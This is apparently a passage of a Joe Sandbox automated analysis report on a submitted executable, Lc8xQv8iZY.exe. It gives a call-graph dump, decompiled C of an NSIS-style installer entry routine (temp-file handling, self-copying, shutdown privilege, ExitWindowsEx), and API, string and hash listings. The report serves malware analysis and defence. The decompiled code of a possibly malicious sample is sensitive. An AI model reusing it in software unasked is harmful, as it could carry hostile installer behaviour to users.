401992 lstrlenA 4252->4254 4254->4253 4255->4252 4256 4019b5 4257 402a0c 18 API calls 4256->4257 4258 4019bc 4257->4258 4259 402a0c 18 API calls 4258->4259 4260 4019c5 4259->4260 4261 4019cc lstrcmpiA 4260->4261 4262 4019de lstrcmpA 4260->4262 4263 4019d2 4261->4263 4262->4263 4264 404936 GetDlgItem GetDlgItem 4265 40498a 7 API calls 4264->4265 4268 404ba7 4264->4268 4266 404a30 DeleteObject 4265->4266 4267 404a23 SendMessageA 4265->4267 4269 404a3b 4266->4269 4267->4266 4287 404c91 4268->4287 4296 404c1b 4268->4296 4317 4048b6 SendMessageA 4268->4317 4270 404a72 4269->4270 4271 405d1d 18 API calls 4269->4271 4272 403fb7 19 API calls 4270->4272 4275 404a54 SendMessageA SendMessageA 4271->4275 4278 404a86 4272->4278 4273 404d40 4276 404d55 4273->4276 4277 404d49 SendMessageA 4273->4277 4274 404b9a 4280 40401e 8 API calls 4274->4280 4275->4269 4288 404d67 ImageList_Destroy 4276->4288 4289 404d6e 4276->4289 4293 404d7e 4276->4293 4277->4276 4283 403fb7 19 API calls 4278->4283 4279 404cea SendMessageA 4279->4274 4285 404cff SendMessageA 4279->4285 4286 404f30 4280->4286 4281 404c83 SendMessageA 4281->4287 4297 404a94 4283->4297 4284 404ee4 4284->4274 4294 404ef6 ShowWindow GetDlgItem ShowWindow 4284->4294 4291 404d12 4285->4291 4287->4273 4287->4274 4287->4279 4288->4289 4292 404d77 GlobalFree 4289->4292 4289->4293 4290 404b68 GetWindowLongA SetWindowLongA 4295 404b81 4290->4295 4302 404d23 SendMessageA 4291->4302 4292->4293 4293->4284 4301 40140b 2 API calls 4293->4301 4310 404db0 4293->4310 4294->4274 4298 404b87 ShowWindow 4295->4298 4299 404b9f 4295->4299 4296->4281 4296->4287 4297->4290 4300 404ae3 SendMessageA 4297->4300 4303 404b62 4297->4303 4306 404b30 SendMessageA 4297->4306 4307 404b1f SendMessageA 4297->4307 4315 403fec SendMessageA 4298->4315 4316 403fec SendMessageA 4299->4316 4300->4297 4301->4310 4302->4273 4303->4290 4303->4295 4306->4297 4307->4297 4308 404eba InvalidateRect 4308->4284 4309 404ed0 4308->4309 4313 404871 21 API calls 4309->4313 4311 404dde SendMessageA 4310->4311 4312 404df4 4310->4312 4311->4312 4312->4308 4314 404e68 SendMessageA SendMessageA 4312->4314 4313->4284 4314->4312 4315->4274 4316->4268 4318 404915 SendMessageA 4317->4318 4319 4048d9 GetMessagePos ScreenToClient SendMessageA 4317->4319 4321 40490d 4318->4321 4320 404912 4319->4320 4319->4321 4320->4318 4321->4296 4322 402036 4323 402a0c 18 API calls 4322->4323 4324 40203d 4323->4324 4325 402a0c 18 API calls 4324->4325 4326 402047 4325->4326 4327 402a0c 18 API calls 4326->4327 4328 402050 4327->4328 4329 402a0c 18 API calls 4328->4329 4330 40205a 4329->4330 4331 402a0c 18 API calls 4330->4331 4332 402064 4331->4332 4333 402078 CoCreateInstance 4332->4333 4334 402a0c 18 API calls 4332->4334 4335 40214d 4333->4335 4336 402097 4333->4336 4334->4333 4337 401423 25 API calls 4335->4337 4338 40217f 4335->4338 4336->4335 4339 40212c MultiByteToWideChar 4336->4339 4337->4338 4339->4335 4340 404f37 4341 404f45 4340->4341 4342 404f5c 4340->4342 4343 404f4b 4341->4343 4358 404fc5 4341->4358 4344 404f6a IsWindowVisible 4342->4344 4350 404f81 4342->4350 4345 404003 SendMessageA 4343->4345 4347 404f77 4344->4347 4344->4358 4348 404f55 4345->4348 4346 404fcb CallWindowProcA 4346->4348 4349 4048b6 5 API calls 4347->4349 4349->4350 4350->4346 4359 405cfb lstrcpynA 4350->4359 4352 404fb0 4360 405c59 wsprintfA 4352->4360 4354 404fb7 4355 40140b 2 API calls 4354->4355 4356 404fbe 4355->4356 4361 405cfb lstrcpynA 4356->4361 4358->4346 4359->4352 4360->4354 4361->4358 4362 4014b7 4363 4014bd 4362->4363 4364 401389 2 API calls 4363->4364 4365 4014c5 4364->4365 4366 402239 4367 402241 4366->4367 4368 402247 4366->4368 4369 402a0c 18 API calls 4367->4369 4370 402a0c 18 API calls 4368->4370 4372 402257 4368->4372 4369->4368 4370->4372 4371 402265 4374 402a0c 18 API calls 4371->4374 4372->4371 4373 402a0c 18 API calls 4372->4373 4373->4371 4375 40226e WritePrivateProfileStringA 4374->4375 4383 40243d 4384 402b16 19 API calls 4383->4384 4385 402447 4384->4385 4386 4029ef 18 API calls 4385->4386 4387 402450 4386->4387 4388 402473 RegEnumValueA 4387->4388 4389 402467 RegEnumKeyA 4387->4389 4391 402672 4387->4391 4390 40248c RegCloseKey 4388->4390 4388->4391 4389->4390 4390->4391 4393 4022bd 4394 4022c2 4393->4394 4395 4022ed 4393->4395 4396 402b16 19 API calls 4394->4396 4397 402a0c 18 API calls 4395->4397 4398 4022c9 4396->4398 4399 4022f4 4397->4399 4400 402a0c 18 API calls 4398->4400 4403 40230a 4398->4403 4404 402a4c RegOpenKeyExA 4399->4404 4401 4022da RegDeleteValueA RegCloseKey 4400->4401 4401->4403 4405 402a77 4404->4405 4411 402ac3 4404->4411 4406 402a9d RegEnumKeyA 4405->4406 4407 402aaf RegCloseKey 4405->4407 4409 402ad4 RegCloseKey 4405->4409 4412 402a4c 5 API calls 4405->4412 4406->4405 4406->4407 4408 406087 5 API calls 4407->4408 4410 402abf 4408->4410 4409->4411 4410->4411 4413 402aef RegDeleteKeyA 4410->4413 4411->4403 4412->4405 4413->4411

                                                  Executed Functions

                                                  Function 0040324F Relevance: 84.3, APIs: 26, Strings: 22, Instructions: 313stringfilecomCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40324f-403283 SetErrorMode GetVersion 1 403285-40328d call 406087 0->1 2 403296-403326 call 40601d * 3 call 406087 * 2 #17 OleInitialize SHGetFileInfoA call 405cfb GetCommandLineA call 405cfb GetModuleHandleA 0->2 1->2 8 40328f 1->8 20 403332-403347 call 405819 CharNextA 2->20 21 403328-40332d 2->21 8->2 24 4033ac-4033b0 20->24 21->20 25 4033b2 24->25 26 403349-40334c 24->26 29 4033c5-4033dd GetTempPathA call 40321e 25->29 27 403354-40335c 26->27 28 40334e-403352 26->28 30 403364-403367 27->30 31 40335e-40335f 27->31 28->27 28->28 38 4033ff-403416 DeleteFileA call 402c88 29->38 39 4033df-4033fd GetWindowsDirectoryA lstrcatA call 40321e 29->39 33 403369-40336d 30->33 34 40339c-4033a9 call 405819 30->34 31->30 36 40337d-403383 33->36 37 40336f-403378 33->37 34->24 51 4033ab 34->51 43 403393-40339a 36->43 44 403385-40338e 36->44 37->36 41 40337a 37->41 53 40347d-40348c ExitProcess OleUninitialize 38->53 54 403418-40341e 38->54 39->38 39->53 41->36 43->34 49 4033b4-4033c0 call 405cfb 43->49 44->43 48 403390 44->48 48->43 49->29 51->24 55 4035a1-4035a7 53->55 56 403492-4034a2 call 4055bc ExitProcess 53->56 57 403420-403429 call 405819 54->57 58 40346d-403474 call 40374e 54->58 60 403644-40364c 55->60 61 4035ad-4035ca call 406087 * 3 55->61 70 403434-403436 57->70 69 403479 58->69 64 403652-403656 ExitProcess 60->64 65 40364e 60->65 88 403614-403622 call 406087 61->88 89 4035cc-4035ce 61->89 65->64 69->53 72 403438-403442 70->72 73 40342b-403431 70->73 76 403444-403451 call 4058cf 72->76 77 4034a8-4034bc call 405543 lstrcatA 72->77 73->72 75 403433 73->75 75->70 76->53 87 403453-403469 call 405cfb * 2 76->87 85 4034c9-4034e3 lstrcatA lstrcmpiA 77->85 86 4034be-4034c4 lstrcatA 77->86 85->53 91 4034e5-4034e8 85->91 86->85 87->58 99 403630-40363b ExitWindowsEx 88->99 100 403624-40362e 88->100 89->88 93 4035d0-4035d2 89->93 95 4034f1 call 405526 91->95 96 4034ea-4034ef call 4054a9 91->96 93->88 98 4035d4-4035e6 GetCurrentProcess 93->98 108 4034f6-403503 SetCurrentDirectoryA 95->108 96->108 98->88 111 4035e8-40360a 98->111 99->60 107 40363d-40363f call 40140b 99->107 100->99 100->107 107->60 109 403510-40352a call 405cfb 108->109 110 403505-40350b call 405cfb 108->110 118 40352f-40354b call 405d1d DeleteFileA 109->118 110->109 111->88 121 40358c-403593 118->121 122 40354d-40355d CopyFileA 118->122 121->118 123 403595-40359c call 405a49 121->123 122->121 124 40355f-40357f call 405a49 call 405d1d call 40555b 122->124 123->53 124->121 133 403581-403588 CloseHandle 124->133 133->121
                                                  C-Code - Quality: 77%
                                                  			_entry_() {
				intOrPtr _t40;
				CHAR* _t44;
				char* _t47;
				signed int _t49;
				void* _t53;
				intOrPtr _t55;
				int _t56;
				signed int _t59;
				signed int _t60;
				int _t61;
				signed int _t63;
				signed int _t66;
				int _t83;
				void* _t87;
				void* _t99;
				intOrPtr* _t100;
				void* _t103;
				CHAR* _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t113;
				signed int _t115;
				char* _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				char _t138;

				 *(_t121 + 0x1c) = 0;
				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				_t110 = 0;
				 *(_t121 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t100 = E00406087(0);
					if(_t100 != 0) {
						 *_t100(0xc00);
					}
				}
				E0040601D("UXTHEME"); // executed
				E0040601D("USERENV"); // executed
				E0040601D("SETUPAPI"); // executed
				E00406087(0xd);
				_t40 = E00406087(0xb);
				 *0x423f84 = _t40;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x424038 = _t40;
				SHGetFileInfoA(0x41f538, 0, _t121 + 0x34, 0x160, 0); // executed
				E00405CFB(0x423780, "NSIS Error");
				_t44 = GetCommandLineA();
				_t117 = "\"C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe\"";
				E00405CFB(_t117, _t44);
				 *0x423f80 = GetModuleHandleA(0);
				_t47 = _t117;
				if("\"C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe\"" == 0x22) {
					 *((char*)(_t121 + 0x14)) = 0x22;
					_t47 =  &M0042A001;
				}
				_t49 = CharNextA(E00405819(_t47,  *((intOrPtr*)(_t121 + 0x14))));
				 *(_t121 + 0x1c) = _t49;
				while(1) {
					_t103 =  *_t49;
					_t125 = _t103;
					if(_t103 == 0) {
						break;
					}
					__eflags = _t103 - 0x20;
					if(_t103 != 0x20) {
						L8:
						__eflags =  *_t49 - 0x22;
						 *((char*)(_t121 + 0x14)) = 0x20;
						if( *_t49 == 0x22) {
							_t49 = _t49 + 1;
							__eflags = _t49;
							 *((char*)(_t121 + 0x14)) = 0x22;
						}
						__eflags =  *_t49 - 0x2f;
						if( *_t49 != 0x2f) {
							L18:
							_t49 = E00405819(_t49,  *((intOrPtr*)(_t121 + 0x14)));
							__eflags =  *_t49 - 0x22;
							if(__eflags == 0) {
								_t49 = _t49 + 1;
								__eflags = _t49;
							}
							continue;
						} else {
							_t49 = _t49 + 1;
							__eflags =  *_t49 - 0x53;
							if( *_t49 == 0x53) {
								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000002;
									__eflags = _t110;
								}
							}
							__eflags =  *_t49 - 0x4352434e;
							if( *_t49 == 0x4352434e) {
								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000004;
									__eflags = _t110;
								}
							}
							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t49 - 2)) = 0;
								__eflags = _t49 + 2;
								E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t49 + 2);
								L23:
								_t108 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t108);
								_t53 = E0040321E(_t125);
								_t126 = _t53;
								if(_t53 != 0) {
									L25:
									DeleteFileA("1033"); // executed
									_t55 = E00402C88(_t127, _t110); // executed
									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
									if(_t55 != 0) {
										L35:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										_t134 =  *((intOrPtr*)(_t121 + 0x10));
										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
											__eflags =  *0x424014;
											if( *0x424014 == 0) {
												L62:
												_t56 =  *0x42402c;
												__eflags = _t56 - 0xffffffff;
												if(_t56 != 0xffffffff) {
													 *(_t121 + 0x18) = _t56;
												}
												ExitProcess( *(_t121 + 0x18));
											}
											_t118 = E00406087(5);
											_t111 = E00406087(6);
											_t59 = E00406087(7);
											__eflags = _t118;
											_t109 = _t59;
											if(_t118 != 0) {
												__eflags = _t111;
												if(_t111 != 0) {
													__eflags = _t109;
													if(_t109 != 0) {
														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
														__eflags = _t66;
														if(_t66 != 0) {
															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
															 *(_t121 + 0x38) = 1;
															 *(_t121 + 0x44) = 2;
															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
														}
													}
												}
											}
											_t60 = E00406087(8);
											__eflags = _t60;
											if(_t60 == 0) {
												L60:
												_t61 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t61;
												if(_t61 != 0) {
													goto L62;
												}
												goto L61;
											} else {
												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t63;
												if(_t63 == 0) {
													L61:
													E0040140B(9);
													goto L62;
												}
												goto L60;
											}
										}
										E004055BC( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x423f9c == 0) {
										L34:
										 *0x42402c =  *0x42402c | 0xffffffff;
										 *(_t121 + 0x18) = E0040374E( *0x42402c);
										goto L35;
									}
									_t115 = E00405819(_t117, 0);
									while(_t115 >= _t117) {
										__eflags =  *_t115 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t115 = _t115 - 1;
										__eflags = _t115;
									}
									_t131 = _t115 - _t117;
									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
									if(_t115 < _t117) {
										_t113 = E00405543(_t134);
										lstrcatA(_t108, "~nsu");
										if(_t113 != 0) {
											lstrcatA(_t108, "A");
										}
										lstrcatA(_t108, ".tmp");
										_t119 = "C:\\Users\\jones\\Desktop";
										if(lstrcmpiA(_t108, "C:\\Users\\jones\\Desktop") != 0) {
											_push(_t108);
											if(_t113 == 0) {
												E00405526();
											} else {
												E004054A9();
											}
											SetCurrentDirectoryA(_t108);
											_t138 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
											if(_t138 == 0) {
												E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t119);
											}
											E00405CFB(0x425000,  *(_t121 + 0x1c));
											 *0x425400 = 0x41;
											_t120 = 0x1a;
											do {
												E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x120)));
												DeleteFileA(0x41f138);
												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
													_t83 = CopyFileA("C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe", 0x41f138, 1);
													_t140 = _t83;
													if(_t83 != 0) {
														_push(0);
														_push(0x41f138);
														E00405A49(_t140);
														E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x124)));
														_t87 = E0040555B(0x41f138);
														if(_t87 != 0) {
															CloseHandle(_t87);
															 *((intOrPtr*)(_t121 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t120 = _t120 - 1;
												_t142 = _t120;
											} while (_t120 != 0);
											_push(0);
											_push(_t108);
											E00405A49(_t142);
										}
										goto L35;
									}
									 *_t115 = 0;
									_t116 = _t115 + 4;
									if(E004058CF(_t131, _t115 + 4) == 0) {
										goto L35;
									}
									E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t116);
									E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t116);
									 *((intOrPtr*)(_t121 + 0x10)) = 0;
									goto L34;
								}
								GetWindowsDirectoryA(_t108, 0x3fb);
								lstrcatA(_t108, "\\Temp");
								_t99 = E0040321E(_t126);
								_t127 = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								goto L25;
							} else {
								goto L18;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t49 = _t49 + 1;
						__eflags =  *_t49 - 0x20;
					} while ( *_t49 == 0x20);
					goto L8;
				}
				goto L23;
			}































                                                  0x00403260
                                                  0x00403264
                                                  0x0040326c
                                                  0x0040326e
                                                  0x00403273
                                                  0x00403283
                                                  0x00403286
                                                  0x0040328d
                                                  0x00403294
                                                  0x00403294
                                                  0x0040328d
                                                  0x0040329b
                                                  0x004032a5
                                                  0x004032af
                                                  0x004032b6
                                                  0x004032bd
                                                  0x004032c2
                                                  0x004032c7
                                                  0x004032ce
                                                  0x004032d4
                                                  0x004032ea
                                                  0x004032fa
                                                  0x004032ff
                                                  0x00403305
                                                  0x0040330c
                                                  0x0040331f
                                                  0x00403324
                                                  0x00403326
                                                  0x00403328
                                                  0x0040332d
                                                  0x0040332d
                                                  0x0040333d
                                                  0x00403343
                                                  0x004033ac
                                                  0x004033ac
                                                  0x004033ae
                                                  0x004033b0
                                                  0x00000000
                                                  0x00000000
                                                  0x00403349
                                                  0x0040334c
                                                  0x00403354
                                                  0x00403354
                                                  0x00403357
                                                  0x0040335c
                                                  0x0040335e
                                                  0x0040335e
                                                  0x0040335f
                                                  0x0040335f
                                                  0x00403364
                                                  0x00403367
                                                  0x0040339c
                                                  0x004033a1
                                                  0x004033a6
                                                  0x004033a9
                                                  0x004033ab
                                                  0x004033ab
                                                  0x004033ab
                                                  0x00000000
                                                  0x00403369
                                                  0x00403369
                                                  0x0040336a
                                                  0x0040336d
                                                  0x00403375
                                                  0x00403378
                                                  0x0040337a
                                                  0x0040337a
                                                  0x0040337a
                                                  0x00403378
                                                  0x0040337d
                                                  0x00403383
                                                  0x0040338b
                                                  0x0040338e
                                                  0x00403390
                                                  0x00403390
                                                  0x00403390
                                                  0x0040338e
                                                  0x00403393
                                                  0x0040339a
                                                  0x004033b4
                                                  0x004033b7
                                                  0x004033c0
                                                  0x004033c5
                                                  0x004033c5
                                                  0x004033d0
                                                  0x004033d6
                                                  0x004033db
                                                  0x004033dd
                                                  0x004033ff
                                                  0x00403404
                                                  0x0040340b
                                                  0x00403412
                                                  0x00403416
                                                  0x0040347d
                                                  0x0040347d
                                                  0x00403482
                                                  0x00403488
                                                  0x0040348c
                                                  0x004035a1
                                                  0x004035a7
                                                  0x00403644
                                                  0x00403644
                                                  0x00403649
                                                  0x0040364c
                                                  0x0040364e
                                                  0x0040364e
                                                  0x00403656
                                                  0x00403656
                                                  0x004035b6
                                                  0x004035bf
                                                  0x004035c1
                                                  0x004035c6
                                                  0x004035c8
                                                  0x004035ca
                                                  0x004035cc
                                                  0x004035ce
                                                  0x004035d0
                                                  0x004035d2
                                                  0x004035e2
                                                  0x004035e4
                                                  0x004035e6
                                                  0x004035f3
                                                  0x00403602
                                                  0x0040360a
                                                  0x00403612
                                                  0x00403612
                                                  0x004035e6
                                                  0x004035d2
                                                  0x004035ce
                                                  0x00403616
                                                  0x0040361b
                                                  0x00403622
                                                  0x00403630
                                                  0x00403633
                                                  0x00403639
                                                  0x0040363b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403624
                                                  0x0040362a
                                                  0x0040362c
                                                  0x0040362e
                                                  0x0040363d
                                                  0x0040363f
                                                  0x00000000
                                                  0x0040363f
                                                  0x00000000
                                                  0x0040362e
                                                  0x00403622
                                                  0x0040349b
                                                  0x004034a2
                                                  0x004034a2
                                                  0x0040341e
                                                  0x0040346d
                                                  0x0040346d
                                                  0x00403479
                                                  0x00000000
                                                  0x00403479
                                                  0x00403427
                                                  0x00403434
                                                  0x0040342b
                                                  0x00403431
                                                  0x00000000
                                                  0x00000000
                                                  0x00403433
                                                  0x00403433
                                                  0x00403433
                                                  0x00403438
                                                  0x0040343a
                                                  0x00403442
                                                  0x004034b3
                                                  0x004034b5
                                                  0x004034bc
                                                  0x004034c4
                                                  0x004034c4
                                                  0x004034cf
                                                  0x004034d4
                                                  0x004034e3
                                                  0x004034e7
                                                  0x004034e8
                                                  0x004034f1
                                                  0x004034ea
                                                  0x004034ea
                                                  0x004034ea
                                                  0x004034f7
                                                  0x004034fd
                                                  0x00403503
                                                  0x0040350b
                                                  0x0040350b
                                                  0x00403519
                                                  0x00403520
                                                  0x00403529
                                                  0x0040352f
                                                  0x0040353b
                                                  0x00403541
                                                  0x0040354b
                                                  0x00403555
                                                  0x0040355b
                                                  0x0040355d
                                                  0x0040355f
                                                  0x00403560
                                                  0x00403561
                                                  0x00403572
                                                  0x00403578
                                                  0x0040357f
                                                  0x00403582
                                                  0x00403588
                                                  0x00403588
                                                  0x0040357f
                                                  0x0040355d
                                                  0x0040358c
                                                  0x00403592
                                                  0x00403592
                                                  0x00403592
                                                  0x00403595
                                                  0x00403596
                                                  0x00403597
                                                  0x00403597
                                                  0x00000000
                                                  0x004034e3
                                                  0x00403444
                                                  0x00403446
                                                  0x00403451
                                                  0x00000000
                                                  0x00000000
                                                  0x00403459
                                                  0x00403464
                                                  0x00403469
                                                  0x00000000
                                                  0x00403469
                                                  0x004033e5
                                                  0x004033f1
                                                  0x004033f6
                                                  0x004033fb
                                                  0x004033fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040339a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040334e
                                                  0x0040334e
                                                  0x0040334e
                                                  0x0040334f
                                                  0x0040334f
                                                  0x00000000
                                                  0x0040334e
                                                  0x00000000

                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403273
                                                  • GetVersion.KERNEL32 ref: 00403279
                                                  • #17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 004032C7
                                                  • OleInitialize.OLE32(00000000), ref: 004032CE
                                                  • SHGetFileInfoA.SHELL32(0041F538,00000000,?,00000160,00000000), ref: 004032EA
                                                  • GetCommandLineA.KERNEL32(00423780,NSIS Error), ref: 004032FF
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000), ref: 00403312
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00409130), ref: 0040333D
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033D0
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033E5
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F1
                                                  • DeleteFileA.KERNELBASE(1033), ref: 00403404
                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                  • ExitProcess.KERNEL32(00000000), ref: 0040347D
                                                  • OleUninitialize.OLE32(00000000), ref: 00403482
                                                  • ExitProcess.KERNEL32 ref: 004034A2
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000,00000000), ref: 004034B5
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000,00000000), ref: 004034C4
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000,00000000), ref: 004034CF
                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000,00000000), ref: 004034DB
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004034F7
                                                  • DeleteFileA.KERNEL32(0041F138,0041F138,?,00425000,?), ref: 00403541
                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\Lc8xQv8iZY.exe,0041F138,00000001), ref: 00403555
                                                  • CloseHandle.KERNEL32(00000000,0041F138,0041F138,?,0041F138,00000000), ref: 00403582
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004035DB
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403633
                                                  • ExitProcess.KERNEL32 ref: 00403656
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
                                                  • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Lc8xQv8iZY.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Lc8xQv8iZY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
                                                  • API String ID: 2193684524-30258393
                                                  • Opcode ID: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                                  • Instruction ID: fae095d870e6aa7b2133663338cad99947a58f50826f320776521e81424d7011
                                                  • Opcode Fuzzy Hash: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                                  • Instruction Fuzzy Hash: 19A1D370A083417AE7217F619C4AB2B7EAC9B4170AF54053FF881761D2CB7C9E058A6F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405620 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 279 405620-40563b call 4058cf 282 405654-40565e 279->282 283 40563d-40564f DeleteFileA 279->283 285 405660-405662 282->285 286 405672-405680 call 405cfb 282->286 284 4057e8-4057eb 283->284 287 405793-405799 285->287 288 405668-40566c 285->288 294 405682-40568d lstrcatA 286->294 295 40568f-405690 call 405835 286->295 287->284 290 40579b-40579e 287->290 288->286 288->287 292 4057a0-4057a6 290->292 293 4057a8-4057b0 call 405ff6 290->293 292->284 293->284 303 4057b2-4057c7 call 4057ee call 4059b3 RemoveDirectoryA 293->303 297 405695-405698 294->297 295->297 300 4056a3-4056a9 lstrcatA 297->300 301 40569a-4056a1 297->301 302 4056ae-4056cc lstrlenA FindFirstFileA 300->302 301->300 301->302 304 4056d2-4056e9 call 405819 302->304 305 405789-40578d 302->305 318 4057e0-4057e3 call 404fe7 303->318 319 4057c9-4057cd 303->319 312 4056f4-4056f7 304->312 313 4056eb-4056ef 304->313 305->287 307 40578f 305->307 307->287 316 4056f9-4056fe 312->316 317 40570a-405718 call 405cfb 312->317 313->312 315 4056f1 313->315 315->312 321 405700-405702 316->321 322 405768-40577a FindNextFileA 316->322 329 40571a-405722 317->329 330 40572f-40573e call 4059b3 DeleteFileA 317->330 318->284 319->292 324 4057cf-4057de call 404fe7 call 405a49 319->324 321->317 325 405704-405708 321->325 322->304 327 405780-405783 FindClose 322->327 324->284 325->317 325->322 327->305 329->322 334 405724-40572d call 405620 329->334 339 405760-405763 call 404fe7 330->339 340 405740-405744 330->340 334->322 339->322 341 405746-405756 call 404fe7 call 405a49 340->341 342 405758-40575e 340->342 341->322 342->322
                                                  C-Code - Quality: 94%
                                                  			E00405620(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
